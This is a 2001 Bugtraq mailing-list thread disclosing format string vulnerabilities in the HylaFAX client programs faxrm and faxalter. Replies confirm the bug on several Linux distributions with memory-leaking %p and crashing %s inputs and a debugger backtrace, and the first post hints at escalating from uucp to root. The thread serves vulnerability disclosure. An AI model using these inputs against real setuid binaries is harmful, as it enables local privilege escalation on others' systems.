7168314 2001-09-23 11:50 +0200 /14 rader/ <christer.oberg@gmx.net> Sänt av: joel@lysator.liu.se Importerad: 2001-09-24 18:44 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <19280> Ärende: hylafax ------------------------------------------------------------ From: christer.oberg@gmx.net To: bugtraq@securityfocus.com Message-ID: <3629.1001238645@www8.gmx.net> There are some format strings vulnerbilities in the lastest hylafax package try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept". Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from port collection). uid uucp is not that exciting but with some luck you'll find uucp owned binaries running from cron with uid 0. -- Sent through GMX FreeMail - http://www.gmx.net (7168314) / <christer.oberg@gmx.net>/-----(Ombruten) Kommentar i text 7168568 av Robert van der Meulen <rvdm@cistron.nl> Kommentar i text 7171211 av KF <dotslash@snosoft.com> 7168568 2001-09-24 18:54 +0200 /27 rader/ Robert van der Meulen <rvdm@cistron.nl> Sänt av: joel@lysator.liu.se Importerad: 2001-09-24 19:21 av Brevbäraren Extern mottagare: christer.oberg@gmx.net Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <19281> Kommentar till text 7168314 av <christer.oberg@gmx.net> Ärende: Re: hylafax ------------------------------------------------------------ From: Robert van der Meulen <rvdm@cistron.nl> To: christer.oberg@gmx.net Cc: bugtraq@securityfocus.com Message-ID: <20010924185412.A17611@wiretrip.org> Hi, Quoting christer.oberg@gmx.net (christer.oberg@gmx.net): > There are some format strings vulnerbilities in the lastest hylafax package > try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept". > Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from > port collection). uid uucp is not that exciting but with some luck you'll > find uucp owned binaries running from cron with uid 0. Just for everyone's I: This 'works' on Debian stable/unstable, but faxrm/faxalter are non-suid (as all other hylafax-client binaries). Greets, Robert -- Linux Generation encrypted mail preferred. finger rvdm@debian.org for my GnuPG/PGP key. It's hard to believe they put men on the Moon with only 5K of RAM. -- Wired (7168568) /Robert van der Meulen <rvdm@cistron.nl>/(Ombruten) 7171211 2000-09-04 04:54 -0400 /44 rader/ KF <dotslash@snosoft.com> Sänt av: joel@lysator.liu.se Importerad: 2001-09-25 07:37 av Brevbäraren Extern mottagare: christer.oberg@gmx.net Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <19290> Kommentar till text 7168314 av <christer.oberg@gmx.net> Ärende: Re: hylafax ------------------------------------------------------------ From: KF <dotslash@snosoft.com> To: christer.oberg@gmx.net Cc: bugtraq@securityfocus.com Message-ID: <39B3633B.2AB6F94F@snosoft.com> Same deal on Mandrake 8.0... hylafax-client-4.1-5mdk.i586.rpm [root@linux /root]# cat /etc/redhat-release Linux Mandrake release 8.0 (Traktopel) for i586 [root@linux /root]# ls -al /usr/bin/faxalter -rwxr-xr-x 1 root root 13380 Aug 6 2001 /usr/bin/faxalter* [root@linux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1 0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown host [root@linux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1 Segmentation fault (core dumped) [root@linux elguapo]# gdb /usr/bin/faxalter core (gdb) bt #0 0x40209ab7 in vfprintf () from /lib/libc.so.6 #1 0x4020d0f0 in vfprintf () from /lib/libc.so.6 #2 0x40207d7b in vfprintf () from /lib/libc.so.6 #3 0x40066509 in FaxClient::vprintError () from /usr/lib/libfaxutil.so.4.0.1 -KF > > There are some format strings vulnerbilities in the lastest hylafax package > try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept". > Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from > port collection). uid uucp is not that exciting but with some luck you'll > find uucp owned binaries running from cron with uid 0. > > -- > Sent through GMX FreeMail - http://www.gmx.net (7171211) /KF <dotslash@snosoft.com>/-----(Ombruten)